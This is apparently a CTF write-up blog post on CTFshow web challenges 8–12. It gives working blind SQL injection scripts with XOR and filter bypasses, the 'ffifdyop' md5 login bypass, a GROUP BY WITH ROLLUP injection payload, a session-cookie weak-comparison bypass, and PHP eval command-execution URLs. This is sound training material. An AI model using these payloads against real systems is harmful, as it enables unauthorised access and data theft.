【异或注入&布尔注入&利用with rollup注入】 2021.7.21 CTFshow刷题

CTFshow刷题

web8

异或注入,布尔注入,绕过逗号,绕过空格

相比上一道web7,需要绕过逗号和引号。

可以使用异或注入,整个注入过程和web7一样,这里就贴一个链接。

【日志注入&文件包含&SQL盲注】2021.7.20 CTFshow刷题 | Mocha–Just a novice (xiinnn.com)

先爆数据库名称

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 0/**/^/**/(ascii(substr(database()/**/from/**/1/**/for/**/1))=119)#

import requests

url = "http://0bea89b3-00b0-48a5-8f7c-7711983954f9.challenge.ctf.show:8080/index.php"
dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',','{','}','-']
ans = ""

for i in range( 1 , 10):
for j in dic:
paylaod = {
"id" : "0/**/^/**/(ascii(substr(database()/**/from/**/{0}/**/for/**/1))={1})#".format( str(i) , str(ord(j)))
}
res = requests.get(url , params=paylaod)
if "If" in res.text:
ans += j
print(ans)

image-20210721142233028

得到数据库名称为web8

再爆数据表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 0/**/^/**/(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="web8")/**/from/**/1/**/for/**/1))=119)#

import requests

url = "http://0bea89b3-00b0-48a5-8f7c-7711983954f9.challenge.ctf.show:8080/index.php"
dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',','{','}','-']
ans = ""

for i in range( 1 , 20):
for j in dic:
paylaod = {
"id" : '''0/**/^/**/(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="web8")/**/from/**/{0}/**/for/**/1))={1})#'''.format( str(i) , str(ord(j)))
}
res = requests.get(url , params=paylaod)
if "If" in res.text:
ans += j
print(ans)

image-20210721143009358

得到三个数据表

再爆flag表下字段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 0/**/^/**/(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="flag")/**/from/**/1/**/for/**/1))=119)#

import requests

url = "http://0bea89b3-00b0-48a5-8f7c-7711983954f9.challenge.ctf.show:8080/index.php"
dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',','{','}','-']
ans = ""

for i in range( 1 , 20):
for j in dic:
paylaod = {
"id" : '''0/**/^/**/(ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="flag")/**/from/**/{0}/**/for/**/1))={1})#'''.format( str(i) , str(ord(j)))
}
res = requests.get(url , params=paylaod)
if "If" in res.text:
ans += j
print(ans)

image-20210721143533073

得到flag字段

再爆值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# 0/**/^/**/(ascii(substr((select/**/group_concat(flag)/**/from/**/web8.flag)/**/from/**/1/**/for/**/1))=119)#

import requests

url = "http://0bea89b3-00b0-48a5-8f7c-7711983954f9.challenge.ctf.show:8080/index.php"
dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',','{','}','-']
ans = ""

for i in range( 1 , 55):
for j in dic:
paylaod = {
"id" : '''0/**/^/**/(ascii(substr((select/**/group_concat(flag)/**/from/**/web8.flag)/**/from/**/{0}/**/for/**/1))={1})#'''.format( str(i) , str(ord(j)))
}
res = requests.get(url , params=paylaod)
if "If" in res.text:
ans += j
print(ans)

image-20210721144123836

得到flag:ctfshow{adbed598-0f17-4846-9fb4-d05907f0432b}

web9

打开题目,是一道登录题

image-20210721150402542

扫一扫目录

1
python3 dirsearch.py -u http://0a4806d7-ef2a-495a-924f-6d599d88230d.challenge.ctf.show:8080/

image-20210721150441665

看到有robots.txt

image-20210721150635082

访问index.phps

得到一个文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$flag="";
$password=$_POST['password'];
if(strlen($password)>10){
die("password error");
}
$sql="select * from user where username ='admin' and password ='".md5($password,true)."'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
echo "登陆成功<br>";
echo $flag;
}
}
?>

看到md5($password,true)

直接输入ffifdyop即可登录

image-20210721150800775

得到flag:ctfshow{22020dc2-8fea-4468-b5b4-487d3cfdf243}

web10

利用with rollup注入

打开题目,页面如下

image-20210721181028866

点击取消按钮即可下载index.phps文件

文件内容如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
<?php
$flag="";
function replaceSpecialChar($strParam){
$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
return preg_replace($regex,"",$strParam);
}
if (!$con)
{
die('Could not connect: ' . mysqli_error());
}
if(strlen($username)!=strlen(replaceSpecialChar($username))){
die("sql inject error");
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
die("sql inject error");
}
$sql="select * from user where username = '$username'";
$result=mysqli_query($con,$sql);
if(mysqli_num_rows($result)>0){
while($row=mysqli_fetch_assoc($result)){
if($password==$row['password']){
echo "登陆成功<br>";
echo $flag;
}

}
}
?>

可以看到,由于有下方这一行if判断,导致不能双写绕过

1
if(strlen($username)!=strlen(replaceSpecialChar($username)))

并且过滤了union和select,导致我们不能像GXYCTF2019 BabySQli题目那样联合注入虚拟用户。(这里贴个之前这道题的链接:【联合注入添加临时虚拟用户】GXYCTF2019 BabySQli WriteUp | Mocha–Just a novice (xiinnn.com)

所以在下方补充一个知识点

知识点:

MySQL中的group by:将结果集中的数据行根据选择列的值进行逻辑分组

例如我们有一个表,内容如下:

SQL语句如下:

1
select * from test_table;

image-20210721183154512

这个时候我们使用group by语句

1
select flag,count(*) from test_table group by flag;

image-20210721183303106

可以看到,MySQL对其进行了排序

接下来我们使用with rollup (group by 后可以跟with rollup,表示在进行分组统计的基础上再次进行汇总统计)

1
select flag,count(*) from test_table group by flag with rollup;

image-20210721183419930

这个时候最后一行就多出了统计行。

  • 可以使用 LIMIT 属性来设定返回的记录数。
  • 可以通过OFFSET指定SELECT语句开始查询的数据偏移量。默认情况下偏移量为0。

这时候我们再结合limitoffset进行限制

1
select flag,count(*) from test_table group by flag with rollup limit 1 offset 3;

image-20210721184057080

这样我们读取出来的flag值为空

我们就可以利用这一点绕过下方的代码

1
2
3
4
5
while($row=mysqli_fetch_assoc($result)){
if($password==$row['password']){
echo "登陆成功<br>";echo $flag;
}
}

payload为:

1
password=&username=admin'or/**/1=1/**/GROUP/**/BY/**/password/**/WITH/**/ROLLUP/**/LIMIT/**/1/**/OFFSET/**/1#

image-20210721184334412

得到flag为:ctfshow{966a15bb-5851-481b-8b9d-f72eceb21cfd}

web11

扫源码,弱类型比较漏洞,清cookie

打开题目,页面如下:

image-20210721184900225

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
function replaceSpecialChar($strParam){
$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i";
return preg_replace($regex,"",$strParam);
}
if(strlen($password)!=strlen(replaceSpecialChar($password))){
die("sql inject error");
}
if($password==$_SESSION['password']){
echo $flag;
}else{
echo "error";
}
?>

可以看到题目将password和session中的password进行判断

因此随便发个密码,进行截包

image-20210721185052333

把Cookie值删了,然后把password设置为空

POC 如下:

1
2
3
4
5
6
7
8
9
GET /login.php?password= HTTP/1.1
Host: dc92a604-2119-46da-a000-64f8ae67324a.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Referer: http://dc92a604-2119-46da-a000-64f8ae67324a.challenge.ctf.show:8080/
Connection: close
Upgrade-Insecure-Requests: 1

image-20210721185139998

得到flag:ctfshow{75ac2dce-f79c-4a6d-a6b4-e3a3fdd4fd08}

参考资料:

web12

命令执行

打开题目源码,页面如下:

image-20210721190539164

要我们使用get传一个cmd参数

随便试试phpinfo()

1
http://b28fc163-b543-4acb-8c73-c9dc4ecda88f.challenge.ctf.show:8080/index.php?cmd=phpinfo();

image-20210721190643793

猜测是使用eval,我们用highlight把文件打印出来

1
http://b28fc163-b543-4acb-8c73-c9dc4ecda88f.challenge.ctf.show:8080/index.php?cmd=highlight_file("index.php");

image-20210721191016088

可以看到是使用了eval,我们先用scandir和print_r函数打印输出当前目录

1
http://b28fc163-b543-4acb-8c73-c9dc4ecda88f.challenge.ctf.show:8080/index.php?cmd=print_r(scandir("."));

image-20210721191131270

打印输出那个文件名很长的文件。

1
http://b28fc163-b543-4acb-8c73-c9dc4ecda88f.challenge.ctf.show:8080/index.php?cmd=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");

image-20210721191228508

得到flag:ctfshow{5f575bcf-ca48-4a1d-9ccd-e834053c59af}

其他大佬的payload:

利用glob函数扫描目录

1
?cmd=print_r(glob("*"));